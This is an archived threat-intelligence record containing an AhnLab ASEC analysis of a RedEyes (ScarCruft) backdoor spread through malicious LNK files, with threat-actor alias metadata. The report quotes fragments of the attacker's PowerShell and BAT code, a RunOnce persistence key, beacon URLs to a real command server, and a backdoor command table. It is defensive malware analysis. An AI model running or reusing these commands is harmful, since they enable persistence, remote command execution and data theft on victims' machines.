{ "id": "c34a4391-a0d6-429f-8d00-5a3b1cc20da0", "created_at": "2026-04-06T00:21:21.435206Z", "updated_at": "2026-04-10T13:11:23.474122Z", "deleted_at": null, "sha1_hash": "95a9b62c3535d9bcf354344a050f2df6c1f5644a", "title": "Distribution of Backdoor via Malicious LNK: RedEyes (ScarCruft) - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2704414, "plain_text": "Distribution of Backdoor via Malicious LNK: RedEyes (ScarCruft)\r\n- ASEC\r\nBy ATCP\r\nPublished: 2023-08-31 · Archived: 2026-04-05 19:57:14 UTC\r\nAhnLab Security Emergency response Center (ASEC) has confirmed that malware [1], which was previously\r\ndistributed in CHM format, is now being distributed in LNK format. This malware executes additional scripts\r\nlocated at a specific URL through the mshta process. It then receives commands from the threat actor’s server to\r\ncarry out additional malicious behaviors.\r\nThe threat actor has been distributing the confirmed LNK file on a regular website by uploading it alongside\r\nmalware within a compressed file.\r\nhttps://asec.ahnlab.com/en/56756/\r\nPage 1 of 7\n\nThe malicious LNK file has been uploaded under the file name ‘REPORT.ZIP.’ Similar to the malware identified\r\nin \u003cRokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)\u003e [2], this file has an\r\nLNK that contains normal Excel document data and malicious script code.\r\nhttps://asec.ahnlab.com/en/56756/\r\nPage 2 of 7\n\nTherefore, when the ‘Status Survey Table.xlsx.lnk’ file is executed, it creates and executes a normal document\r\ncalled ‘Status Survey Table.xlsx’ and the malicious script ‘PMmVvG56FLC9y.bat’ in the %Temp% folder through\r\nPowerShell commands.\r\n/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Progr\r\n‘Status Survey Table.xlsx’ appears as a normal Excel document and impersonates a Korean public organization in\r\nthe following manner.\r\nWhen the concurrently generated ‘PMmVvG56FLC9y.bat’ file is executed, it is copied into the\r\n‘%appdata%\\Microsoft\\Protect\\’ folder as ‘UserProfileSafeBackup.bat’. Afterward, it is registered in the following\r\nregistry to ensure continuous execution of the BAT file.\r\nRegistry path: HKCU\\ Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\nValue name: BackupUserProfiles\r\nValue: C:\\Windows\\SysWOW64\\cmd.exe /c %appdata%\\Microsoft\\Protect\\UserProfileSafeBackup.bat\r\nAfter registering to the above registry, a PowerShell command in hexadecimal format inside the BAT file is\r\nexecuted.\r\ncopy %~f0 \"%appdata%\\Microsoft\\Protect\\UserProfileSafeBackup.bat\"\r\nREG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce /v BackupUserProfiles /t REG_SZ /f /d \"C:\\Windows\r\nstart /min C:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command\r\n\"$m6drsidu =\"$jWHmcU=\"\"\"53746172742D536C656570202D\u003comitted\u003e\"\"\";$nj4KKFFRe=\"\"\"\"\"\";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ\r\nInvoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));\";\r\nInvoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));\"\r\nWhen the PowerShell command is executed, a Run key registration is carried out alongside the execution of\r\nadditional scripts utilizing mshta. Furthermore, registry registrations can be performed through commands from\r\nthe threat actor. The following is a portion of the PowerShell command represented in hexadecimal format within\r\nthe code of the BAT file.\r\nhttps://asec.ahnlab.com/en/56756/\r\nPage 3 of 7\n\nStart-Sleep -Seconds 67;\r\n$nvSklUbaQ = 1024 * 1024;\r\n$yixgsFVy = $env:COMPUTERNAME + '-' + $env:USERNAME+'-SH';\r\n$aWw = 'hxxp://75.119.136[.]207/config/bases/config.php' + '?U=' + $yixgsFVy;\r\n$bLmoifqHwJxhE = $env:TEMP + '/KsK';\r\nif (!(Test-Path $bLmoifqHwJxhE)) { New-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOn\r\nThe confirmed C2 and malicious URLs are as follows:\r\nhxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH //\r\nReceives commands from the threat actor\r\nhxxp://75.119.136.207/config/bases/config.php?R=[‘EOF’ encoded in base64] // Transmits command\r\nexecution results\r\nhxxp://bian0151.cafe24[.]com/admin/board/1.html // Downloads additional script codes\r\nThe additional script codes (hxxp://bian0151.cafe24.com/admin/board/1.html) executed through mshta contain a\r\nPowerShell command obfuscated in Base64 as shown below. This command performs functions similar to those\r\npreviously disclosed in Table 1 of the post \u003cRedEyes Group Wiretapping Individuals (APT37)\u003e [3].\r\nThe decoded PowerShell command receives and processes commands from the threat actor at\r\nhxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH. Figure 6 shows a\r\nportion of the decoded PowerShell command.\r\nhttps://asec.ahnlab.com/en/56756/\r\nPage 4 of 7\n\nThe commands and features that can be performed are as follows.\r\nCommand Feature\r\npcinfo Collects PC information\r\ndrive Collects drive information\r\nclipboard Collects clipboard content\r\nsvc Collects service information\r\nprocess Collects information on running processes\r\nfileinfo\r\nCollects the names, sizes, last used dates, and complete paths for the subfiles\r\nin the received path\r\nstart Executes received command through cmd\r\nplugin Downloads and executes additional files through PowerShell\r\ndown Downloads additional files in the received path\r\nup Uploads files from the received path\r\nregedit Adds to the registry\r\ncompress Compresses files\r\nTable 1. Commands and features that can be performed\r\nIt is suspected that the attacker is continuously modifying the script code, as the commands listed in Table 1 differ\r\nfrom those previously identified. Therefore, in addition to the functionalities confirmed so far, various other\r\nmalicious activities may also be performed.\r\nAside from the LNK file, the compressed files ‘KB_20230531.rar’, ‘attachment.rar’, and\r\n‘hanacard_20230610.rar’ that were identified alongside ‘REPORT.ZIP’ in Figure 1, also contain the previously\r\nidentified malicious CHM file. Similar to the LNK file described earlier, this CHM file is malware that utilizes\r\nmshta to execute additional scripts located at specific URLs.\r\nhttps://asec.ahnlab.com/en/56756/\r\nPage 5 of 7\n\nDue to the recent mass distribution of malware utilizing CHM and LNK files, users need to exercise extra caution.\r\nIn the case of the malicious LNK files, it has been observed that a significant number of them have a file size\r\nexceeding 10 MB. Therefore, users must refrain from executing large LNK files from unknown sources.\r\n[File Detection]\r\nDropper/LNK.Generic.S2241 (2023.04.24.02)\r\nTrojan/BAT.PsExec.S2247 (2023.06.13.02)\r\nDownloader/Script.Generic.SC191708 (2023.08.17.03)\r\n[Behavior Detection]\r\nDefenseEvasion/DETECT.T1059.M11294\r\nDefenseEvasion/DETECT.T1059.M11295 \r\nMD5\r\n0eb8db3cbde470407f942fd63afe42b8\r\n27f74072d6268b5d96d73107c560d852\r\n2d444b6f72c8327d1d155faa2cca7fd7\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//75[.]119[.]136[.]207/config/bases/config[.]php\r\nAdditional IOCs are available on AhnLab TIP.\r\nhttps://asec.ahnlab.com/en/56756/\r\nPage 6 of 7\n\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/56756/\r\nhttps://asec.ahnlab.com/en/56756/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://asec.ahnlab.com/en/56756/" ], "report_names": [ "56756" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434881, "ts_updated_at": 1775826683, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/95a9b62c3535d9bcf354344a050f2df6c1f5644a.pdf", "text": "https://archive.orkl.eu/95a9b62c3535d9bcf354344a050f2df6c1f5644a.txt", "img": "https://archive.orkl.eu/95a9b62c3535d9bcf354344a050f2df6c1f5644a.jpg" } }